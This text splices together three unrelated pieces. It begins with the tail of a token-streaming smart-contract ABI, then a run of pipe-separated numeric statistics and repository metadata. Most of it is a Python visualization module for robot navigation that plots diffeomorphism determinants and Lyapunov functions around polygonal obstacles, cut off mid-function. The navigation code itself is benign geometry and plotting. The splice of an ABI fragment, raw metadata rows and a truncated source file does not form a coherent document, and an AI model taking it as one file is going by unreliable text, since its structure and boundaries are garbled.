{'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'createCompoundingStream', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'withdrawFromStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'cancelStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
| 5,741
| 12,110
| 0.622975
| 2,015
| 22,964
| 7.097767
| 0.064516
| 0.09614
| 0.1576
| 0.080199
| 0.906377
| 0.880506
| 0.843658
| 0.818277
| 0.782058
| 0.776605
| 0
| 0.028539
| 0.090577
| 22,964
| 3
| 12,111
| 7,654.666667
| 0.656292
| 0
| 0
| 0
| 0
| 0
| 0.584567
| 0.010843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ad7b20f12ec0a1801bda8b7dbb52ac70129dde8f
| 85,404
|
py
|
Python
|
src/libraries/visualization.py
|
vvasilo/semnav
|
e1141035fa4ea8ad3d5f077198a141209693625b
|
[
"MIT"
] | 10
|
2020-02-28T22:26:55.000Z
|
2021-12-14T08:34:18.000Z
|
src/libraries/visualization.py
|
KodlabPenn/semnav
|
489cfe203516e359cc488740b99c8e208a757c2d
|
[
"MIT"
] | 1
|
2020-08-24T23:37:51.000Z
|
2021-11-10T14:29:34.000Z
|
src/libraries/visualization.py
|
vvasilo/semnav
|
e1141035fa4ea8ad3d5f077198a141209693625b
|
[
"MIT"
] | 3
|
2020-02-27T20:22:57.000Z
|
2022-01-21T12:58:32.000Z
|
#!/usr/bin/env python
"""
MIT License (modified)
Copyright (c) 2020 The Trustees of the University of Pennsylvania
Authors:
Vasileios Vasilopoulos <vvasilo@seas.upenn.edu>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this **file** (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# General ROS and Python imports
import struct, math, numpy, os, sys, scipy, time, random
import matplotlib.pyplot as plt
import shapely as sp
from matplotlib.animation import FuncAnimation
from shapely.geometry import Point, LineString
from shapely.geometry.polygon import Polygon
# Reactive planner imports
from reactive_planner_lib import LIDARClass, completeLIDAR2D, compensateObstacleLIDAR2D, readLIDAR2D
from reactive_planner_lib import polygonDiffeoTriangulation, polygonDiffeoConvex, diffeoTreeTriangulation, diffeoTreeConvex, triangleDiffeo, polygonDiffeo, polygonImplicit, triangleSwitch, polygonSwitch
from reactive_planner_lib import localfreespaceLIDAR2D
def visualize_diffeoDeterminant_triangulation(Polygons, RobotRadius, PlotBounds, NumPoints, DiffeoParams):
"""
Function that visualizes the determinant of the diffeomorphism (based on the ear clipping method) on the plane, given a set of polygons and a robot radius
Input:
1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
2) RobotRadius: Robot radius (m)
3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
5) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
robot_radius = 0.25
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
polygon_list = []
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
polygon_list.append(xy)
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_diffeoDeterminant_triangulation(polygon_list, robot_radius, bounds, num_points, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Construct list of polygonal objects and enlarge by robot radius
polygon_list = []
for i in range(len(Polygons)):
polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
# Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
polygon_list_merged = []
i = 0
while (i<len(polygon_list)):
polygon_list_merged.append(polygon_list[i])
j = i+1
while (j<len(polygon_list)):
if polygon_list_merged[i].intersects(polygon_list[j]):
polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
del(polygon_list[j])
else:
j = j+1
polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
i = i+1
PolygonList = polygon_list_merged
# Construct list of diffeo trees for all objects
DiffeoTreeArray = []
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = Point(x_coords[i],y_coords[j])
# Check for inclusion in any of the polygons
for k in range(len(polygon_list_merged)):
if polygon_list_merged[k].contains(candidate_point):
data_points[j][i] = numpy.NAN
collision = True
break
else:
collision = False
if collision is True:
continue
else:
# Compute the actual diffeomorphism
PositionTransformed = numpy.array([[x_coords[i],y_coords[j]]])
PositionTransformedD = numpy.eye(2)
PositionTransformedDD = numpy.zeros(8)
for k in range(len(DiffeoTreeArray)):
TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
res1 = TempPositionTransformedD[0][0]*PositionTransformedDD[0] + TempPositionTransformedD[0][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res2 = TempPositionTransformedD[0][0]*PositionTransformedDD[1] + TempPositionTransformedD[0][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res3 = TempPositionTransformedD[0][0]*PositionTransformedDD[2] + TempPositionTransformedD[0][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res4 = TempPositionTransformedD[0][0]*PositionTransformedDD[3] + TempPositionTransformedD[0][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res5 = TempPositionTransformedD[1][0]*PositionTransformedDD[0] + TempPositionTransformedD[1][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res6 = TempPositionTransformedD[1][0]*PositionTransformedDD[1] + TempPositionTransformedD[1][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
res7 = TempPositionTransformedD[1][0]*PositionTransformedDD[2] + TempPositionTransformedD[1][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res8 = TempPositionTransformedD[1][0]*PositionTransformedDD[3] + TempPositionTransformedD[1][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
PositionTransformedDD[0] = res1
PositionTransformedDD[1] = res2
PositionTransformedDD[2] = res3
PositionTransformedDD[3] = res4
PositionTransformedDD[4] = res5
PositionTransformedDD[5] = res6
PositionTransformedDD[6] = res7
PositionTransformedDD[7] = res8
PositionTransformedD = numpy.matmul(TempPositionTransformedD, PositionTransformedD)
PositionTransformed = TempPositionTransformed
# Add the data point
data_points[j][i] = numpy.linalg.det(PositionTransformedD)
print(i+j*y_coords.shape[0])
# Plot the result
plt.imshow(numpy.log(data_points), vmin=numpy.log(data_points[~numpy.isnan(data_points)]).min(), vmax=numpy.log(data_points[~numpy.isnan(data_points)]).max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_diffeoDeterminant_convex(Polygons, RobotRadius, PlotBounds, NumPoints, DiffeoParams):
"""
Function that visualizes the determinant of the diffeomorphism (based on the convex decomposition method) on the plane, given a set of polygons and a robot radius
Input:
1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
2) RobotRadius: Robot radius (m)
3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
5) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
robot_radius = 0.25
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
polygon_list = []
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
polygon_list.append(xy)
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_diffeoDeterminant_convex(polygon_list, robot_radius, bounds, num_points, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Construct list of polygonal objects and enlarge by robot radius
polygon_list = []
for i in range(len(Polygons)):
polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
# Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
polygon_list_merged = []
i = 0
while (i<len(polygon_list)):
polygon_list_merged.append(polygon_list[i])
j = i+1
while (j<len(polygon_list)):
if polygon_list_merged[i].intersects(polygon_list[j]):
polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
del(polygon_list[j])
else:
j = j+1
polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
i = i+1
PolygonList = polygon_list_merged
# Construct list of diffeo trees for all objects
DiffeoTreeArray = []
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
DiffeoTreeArray.append(diffeoTreeConvex(coords, DiffeoParams))
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = Point(x_coords[i],y_coords[j])
# Check for inclusion in any of the polygons
for k in range(len(polygon_list_merged)):
if polygon_list_merged[k].contains(candidate_point):
data_points[j][i] = numpy.NAN
collision = True
break
else:
collision = False
if collision is True:
continue
else:
# Compute the actual diffeomorphism
PositionTransformed = numpy.array([[x_coords[i],y_coords[j]]])
PositionTransformedD = numpy.eye(2)
PositionTransformedDD = numpy.zeros(8)
for k in range(len(DiffeoTreeArray)):
TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoConvex(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
res1 = TempPositionTransformedD[0][0]*PositionTransformedDD[0] + TempPositionTransformedD[0][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res2 = TempPositionTransformedD[0][0]*PositionTransformedDD[1] + TempPositionTransformedD[0][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res3 = TempPositionTransformedD[0][0]*PositionTransformedDD[2] + TempPositionTransformedD[0][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res4 = TempPositionTransformedD[0][0]*PositionTransformedDD[3] + TempPositionTransformedD[0][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res5 = TempPositionTransformedD[1][0]*PositionTransformedDD[0] + TempPositionTransformedD[1][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res6 = TempPositionTransformedD[1][0]*PositionTransformedDD[1] + TempPositionTransformedD[1][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
res7 = TempPositionTransformedD[1][0]*PositionTransformedDD[2] + TempPositionTransformedD[1][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res8 = TempPositionTransformedD[1][0]*PositionTransformedDD[3] + TempPositionTransformedD[1][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
PositionTransformedDD[0] = res1
PositionTransformedDD[1] = res2
PositionTransformedDD[2] = res3
PositionTransformedDD[3] = res4
PositionTransformedDD[4] = res5
PositionTransformedDD[5] = res6
PositionTransformedDD[6] = res7
PositionTransformedDD[7] = res8
PositionTransformedD = numpy.matmul(TempPositionTransformedD, PositionTransformedD)
PositionTransformed = TempPositionTransformed
# Add the data point
data_points[j][i] = numpy.linalg.det(PositionTransformedD)
print(i+j*y_coords.shape[0])
# Plot the result
plt.imshow(numpy.log(data_points), vmin=numpy.log(data_points[~numpy.isnan(data_points)]).min(), vmax=numpy.log(data_points[~numpy.isnan(data_points)]).max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_lyapunov_triangulation(Polygons, RobotRadius, PlotBounds, NumPoints, Goal, DiffeoParams):
"""
Function that visualizes the determinant of the diffeomorphism on the plane (based on the ear clipping method), given a set of polygons and a robot radius
Input:
1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
2) RobotRadius: Robot radius (m)
3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
5) Goal: The desired navigation goal - 1x2 numpy.array
6) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
robot_radius = 0.25
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
goal = numpy.array([[0.0,0.0]])
polygon_list = []
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
polygon_list.append(xy)
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_lyapunov_triangulation(polygon_list, robot_radius, bounds, num_points, goal, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Construct list of polygonal objects and enlarge by robot radius
polygon_list = []
for i in range(len(Polygons)):
polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
# Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
polygon_list_merged = []
i = 0
while (i<len(polygon_list)):
polygon_list_merged.append(polygon_list[i])
j = i+1
while (j<len(polygon_list)):
if polygon_list_merged[i].intersects(polygon_list[j]):
polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
del(polygon_list[j])
else:
j = j+1
polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
i = i+1
PolygonList = polygon_list_merged
# Construct list of diffeo trees for all objects
DiffeoTreeArray = []
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = Point(x_coords[i],y_coords[j])
# Check for inclusion in any of the polygons
for k in range(len(polygon_list_merged)):
if polygon_list_merged[k].contains(candidate_point):
data_points[j][i] = numpy.NAN
collision = True
break
else:
collision = False
if collision is True:
continue
else:
# Compute the actual diffeomorphism
PositionTransformed = numpy.array([[x_coords[i],y_coords[j]]])
PositionTransformedD = numpy.eye(2)
PositionTransformedDD = numpy.zeros(8)
GoalTransformed = Goal
for k in range(len(DiffeoTreeArray)):
TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
TempGoalTransformed, TempGoalTransformedD, TempGoalTransformedDD = polygonDiffeoTriangulation(GoalTransformed, DiffeoTreeArray[k], DiffeoParams)
res1 = TempPositionTransformedD[0][0]*PositionTransformedDD[0] + TempPositionTransformedD[0][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res2 = TempPositionTransformedD[0][0]*PositionTransformedDD[1] + TempPositionTransformedD[0][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
